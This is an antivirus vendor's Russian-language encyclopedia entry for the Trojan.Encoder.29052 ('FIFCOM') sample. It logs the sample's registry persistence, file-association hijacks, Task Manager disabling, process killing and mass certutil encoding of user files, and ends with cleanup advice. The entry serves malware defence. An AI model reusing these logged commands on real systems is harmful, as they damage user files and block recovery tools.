Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Encoder.29052
Добавлен в вирусную базу Dr.Web:
2019-07-24
Описание добавлено:
2019-07-25
Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
[<HKLM>\Software\Classes\73ldLSFhLk\Shell\Open\Command] '' = 'mshta.exe vbscript:CreateObject("SAPI.SpVoice").speak("Hello!I am FIFCOM,Please subscribe to my bilibili channel,thank you.")(Windo...
[<HKLM>\Software\Classes\OSM1QpKfNe\Shell\Open\Command] '' = 'notepad.exe %TEMP%\FIFCOM\JiuyinZhenjing.txt'
[<HKLM>\Software\Classes\SOxqsHMPwM\Shell\Open\Command] '' = 'iexplore.exe https://space.bilibili.com/22112700'
[<HKLM>\Software\Classes\5166HlaKgb\Shell\Open\Command] '' = 'mshta.exe vbscript:Execute("msgbox "" Your computer has been hacked by FIFCOM""&vbNewLine&vbNewLine&ChrW(10139)&"" Subscribe to my ...
[<HKLM>\Software\Classes\Xkn7jvZKnm\Shell\Open\Command] '' = '%TEMP%\FIFCOM\ScreenDissolve.exe'
[<HKLM>\Software\Classes\Ln2yWXl8Js\Shell\Open\Command] '' = '%TEMP%\FIFCOM\Pop.exe'
[<HKLM>\Software\Classes\3XgzkcGrnN\Shell\Open\Command] '' = '%TEMP%\FIFCOM\FileEncoder.exe'
[<HKLM>\Software\Classes\ZfYRXHpTuy\Shell\Open\Command] '' = 'mshta.exe vbscript:Execute("msgbox "" Alipay Red Envelope!""&vbNewLine&"" Please Search:""&vbNewLine&"" [6 1 9 8 3 2 5 5 1]"",0,""F...
[<HKLM>\Software\Classes\EsKjtFXTWm\Shell\Open\Command] '' = '%TEMP%\FIFCOM\BlueScreen.exe'
[<HKLM>\Software\Classes\UsKL1sVP2S\Shell\Open\Command] '' = '%TEMP%\FIFCOM\RandDirGen.exe'
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'UACHack' = '%TEMP%\FIFCOM\UACHack.exe'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
Диспетчера задач (Taskmgr)
Запускает на исполнение
'<SYSTEM32>\taskkill.exe' /f /im explorer.exe
Завершает или пытается завершить
следующие системные процессы:
Изменения в файловой системе
Создает следующие файлы
Удаляет следующие файлы
%TEMP%\cqj4dth5.bat
%TEMP%\c7b33n15.bat
%TEMP%\0lgy9ro0.bat
%TEMP%\4ng70h8m.bat
%TEMP%\87r2s28c.bat
Другое
Ищет следующие окна
ClassName: '' WindowName: ''
ClassName: 'Progman' WindowName: ''
ClassName: 'Proxy Desktop' WindowName: ''
ClassName: 'SystemTray_Main' WindowName: ''
ClassName: 'Media Center Tray Applet' WindowName: ''
ClassName: '' WindowName: 'View Available Networks'
ClassName: 'BluetoothNotificationAreaIconWindowClass' WindowName: 'BluetoothNotificationAreaIconWindowClass'
ClassName: 'BluetoothNotificationAreaIconWindowClass' WindowName: ''
Создает и запускает на исполнение
'%TEMP%\fifcom\fileencoder.exe'
'%TEMP%\fifcom\randdirgen.exe'
'%TEMP%\fifcom\pop.exe'
'<SYSTEM32>\wscript.exe' "<Текущая директория>\config\1.vbs"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\0RMOGXU6.bat" "<Полный путь к файлу>" "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\8G266A3B.bat" %TEMP%\FIFCOM\FileEncoder.exe "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\C7B33N15.bat" %TEMP%\FIFCOM\RandDirGen.exe "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\CQJ4DTH5.bat" %TEMP%\FIFCOM\RandDirGen.exe "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\0LGY9RO0.bat" %TEMP%\FIFCOM\RandDirGen.exe "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\4NG70H8M.bat" %TEMP%\FIFCOM\RandDirGen.exe "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\87R2S28C.bat" %TEMP%\FIFCOM\RandDirGen.exe "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\CWAGTD0J.bat" %TEMP%\FIFCOM\Pop.exe "' (со скрытым окном)
Запускает на исполнение
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\0RMOGXU6.bat" "<Полный путь к файлу>" "
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\P...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\license.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\changelog.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Provider...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\affDescription.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Pro...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\README_th_en_CA_v2.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\README_en_CA.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Provi...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\List.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Pl...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Pl...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_CA\List.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Pl...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Adobe\Products.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Adobe\Products.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLangua...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageName...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguag...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageName...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\LanguageNames2\DisplayLanguageName...
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.FIFCOM"
'<SYSTEM32>\ping.exe' -n 11 127.1
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT.FIFCOM"
'<SYSTEM32>\attrib.exe' +s +a +h +r config
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT.FIFCOM"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\CWAGTD0J.bat" %TEMP%\FIFCOM\Pop.exe "
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Provi...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\WordNet_license.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Pr...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\README_en_US.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Provi...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\added.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\...
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\FireFox\chrome\browser\content\browser\license.html" "%ProgramFiles%\FireFox\chrome\browser\content\browser\license.html.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\FireFox\chrome\browser\content\browser\inspector.html" "%ProgramFiles%\FireFox\chrome\browser\content\browser\inspector.html.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\FireFox\README.txt" "%ProgramFiles%\FireFox\README.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Plugins\FTP\Notes_rus.txt" "%ProgramFiles%\Far2\Plugins\FTP\Notes_rus.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Plugins\FTP\Notes.txt" "%ProgramFiles%\Far2\Plugins\FTP\Notes.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Plugins\FTP\FtpCmds_rus.txt" "%ProgramFiles%\Far2\Plugins\FTP\FtpCmds_rus.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Plugins\FTP\FtpCmds.txt" "%ProgramFiles%\Far2\Plugins\FTP\FtpCmds.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\rus\TechInfo.txt" "%ProgramFiles%\Far2\Documentation\rus\TechInfo.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\rus\Plugins_Review.txt" "%ProgramFiles%\Far2\Documentation\rus\Plugins_Review.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\rus\Plugins_Install.txt" "%ProgramFiles%\Far2\Documentation\rus\Plugins_Install.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\rus\Far_FAQ.txt" "%ProgramFiles%\Far2\Documentation\rus\Far_FAQ.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\rus\Bug_Report.txt" "%ProgramFiles%\Far2\Documentation\rus\Bug_Report.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\rus\Arc_Support.txt" "%ProgramFiles%\Far2\Documentation\rus\Arc_Support.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\eng\Plugins_Review.txt" "%ProgramFiles%\Far2\Documentation\eng\Plugins_Review.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\eng\TechInfo.txt" "%ProgramFiles%\Far2\Documentation\eng\TechInfo.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\eng\Plugins_Install.txt" "%ProgramFiles%\Far2\Documentation\eng\Plugins_Install.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\eng\Far_FAQ.txt" "%ProgramFiles%\Far2\Documentation\eng\Far_FAQ.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\eng\Bug_Report.txt" "%ProgramFiles%\Far2\Documentation\eng\Bug_Report.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Documentation\eng\Arc_Support.txt" "%ProgramFiles%\Far2\Documentation\eng\Arc_Support.txt.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Far2\Addons\README.TXT" "%ProgramFiles%\Far2\Addons\README.TXT.FIFCOM"
'<SYSTEM32>\ping.exe' -n 10 127.1
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\microsoft shared\Smart Tag\METCONV.TXT" "%CommonProgramFiles%\microsoft shared\Smart Tag\METCONV.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\microsoft shared\Office10\CTRYINFO.TXT" "%CommonProgramFiles%\microsoft shared\Office10\CTRYINFO.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\Excluded.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguisti...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\Added.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\excluded.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguisti...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_GB\added.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\...
'<SYSTEM32>\certutil.exe' -encode "%CommonProgramFiles%\Adobe\Reader\11.0\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\excluded.txt" "%CommonProgramFiles%\Adobe\Reader\11.0\Linguisti...
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\FireFox\chrome\browser\content\browser\tabview.html" "%ProgramFiles%\FireFox\chrome\browser\content\browser\tabview.html.FIFCOM"
'<SYSTEM32>\ping.exe' -n 60 127.1
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.FIFCOM"
'%WINDIR%\explorer.exe'
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "OSM1QpKfNe"\DefaultIcon=<SYSTEM32>\shell32.dll,-13"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\IDTemplates\ENU\AdobeID.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Reader\IDTemplates\ENU\AdobeID.pdf.FIFCOM"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "73ldLSFhLk"\DefaultIcon=<SYSTEM32>\shell32.dll,-3"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "UsKL1sVP2S"=%TEMP%\FIFCOM\RandDirGen.exe"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\PDFSigQFormalRep.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Reader\PDFSigQFormalRep.pdf.FIFCOM"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "EsKjtFXTWm"=%TEMP%\FIFCOM\BlueScreen.exe"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "ZfYRXHpTuy"=mshta.exe vbscript:Execute("msgbox "" Alipay Red Envelope!""&vbNewLine&"" Please Search:""&vbNewLine&"" [6 1 9 8 3 2 5 5 1]"",0,""FIFCOM VIRUS"":close")"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "3XgzkcGrnN"=%TEMP%\FIFCOM\FileEncoder.exe"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "Ln2yWXl8Js"=%TEMP%\FIFCOM\Pop.exe"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "Xkn7jvZKnm"=%TEMP%\FIFCOM\ScreenDissolve.exe"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "5166HlaKgb"=mshta.exe vbscript:Execute("msgbox "" Your computer has been hacked by FIFCOM""&vbNewLine&vbNewLine&ChrW(10139)&"" Subscribe to my Bilibili:""&vbNewLine&vbNewLine&"...
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "SOxqsHMPwM"=iexplore.exe https://space.bilibili.com/22112700"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "OSM1QpKfNe"=notepad.exe %TEMP%\FIFCOM\JiuyinZhenjing.txt"
'<SYSTEM32>\cmd.exe' /S /D /c" ftype "73ldLSFhLk"=mshta.exe vbscript:CreateObject("SAPI.SpVoice").speak("Hello!I am FIFCOM,Please subscribe to my bilibili channel,thank you.")(Window.close) "
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .UsKL1sVP2S=UsKL1sVP2S"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .EsKjtFXTWm=EsKjtFXTWm"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .ZfYRXHpTuy=ZfYRXHpTuy"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .3XgzkcGrnN=3XgzkcGrnN"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .Ln2yWXl8Js=Ln2yWXl8Js"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .Xkn7jvZKnm=Xkn7jvZKnm"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .5166HlaKgb=5166HlaKgb"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .SOxqsHMPwM=SOxqsHMPwM"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .OSM1QpKfNe=OSM1QpKfNe"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\8G266A3B.bat" %TEMP%\FIFCOM\FileEncoder.exe "
'<SYSTEM32>\cmd.exe' /S /D /c" assoc .73ldLSFhLk=73ldLSFhLk"
'<SYSTEM32>\cmd.exe' /S /D /c" echo Y"
'<SYSTEM32>\notepad.exe' %TEMP%\FIFCOM\JiuyinZhenjing.txt
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\IDTemplates\ENU\DefaultID.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Reader\IDTemplates\ENU\DefaultID.pdf.FIFCOM"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "SOxqsHMPwM"\DefaultIcon=<SYSTEM32>\shell32.dll,-14"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\Legal\ENU\license.html" "%ProgramFiles%\Adobe\Reader 11.0\Reader\Legal\ENU\license.html.FIFCOM"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "5166HlaKgb"\DefaultIcon=<SYSTEM32>\shell32.dll,-24"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT.FIFCOM...
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.FIFCOM...
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\87R2S28C.bat" %TEMP%\FIFCOM\RandDirGen.exe "
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.FIFCOM...
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop /d "%TEMP%\FIFCOM\Desktop\
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\4NG70H8M.bat" %TEMP%\FIFCOM\RandDirGen.exe "
'<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "UACHack" /t REG_SZ /f /d "%TEMP%\FIFCOM\UACHack.exe"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT.FIFCOM...
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\0LGY9RO0.bat" %TEMP%\FIFCOM\RandDirGen.exe "
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\CQJ4DTH5.bat" %TEMP%\FIFCOM\RandDirGen.exe "
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\C7B33N15.bat" %TEMP%\FIFCOM\RandDirGen.exe "
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.FI...
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.FIFCOM...
'<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\ENUtxt.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Resource\ENUtxt.pdf.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness....
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "UsKL1sVP2S"\DefaultIcon=<SYSTEM32>\shell32.dll,-27"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf.FIFCOM"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "EsKjtFXTWm"\DefaultIcon=<SYSTEM32>\shell32.dll,-22"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "ZfYRXHpTuy"\DefaultIcon=<SYSTEM32>\shell32.dll,-25"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.FIFCOM"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "3XgzkcGrnN"\DefaultIcon=<SYSTEM32>\shell32.dll,-48"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "Ln2yWXl8Js"\DefaultIcon=<SYSTEM32>\shell32.dll,-42"
'<SYSTEM32>\cmd.exe' /S /D /c" assoc "Xkn7jvZKnm"\DefaultIcon=<SYSTEM32>\shell32.dll,-26"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\Words.pdf" "%ProgramFiles%\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\Words.pdf.FIFCOM"
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" "%ProgramFiles%\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT.FIFCOM...
'<SYSTEM32>\certutil.exe' -encode "%ProgramFiles%\FireFox\chrome\browser\skin\classic\aero\browser\keyhole_forward_mask.svg" "%ProgramFiles%\FireFox\chrome\browser\skin\classic\aero\browser\keyhole_forward_mask.svg.FIFC...
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
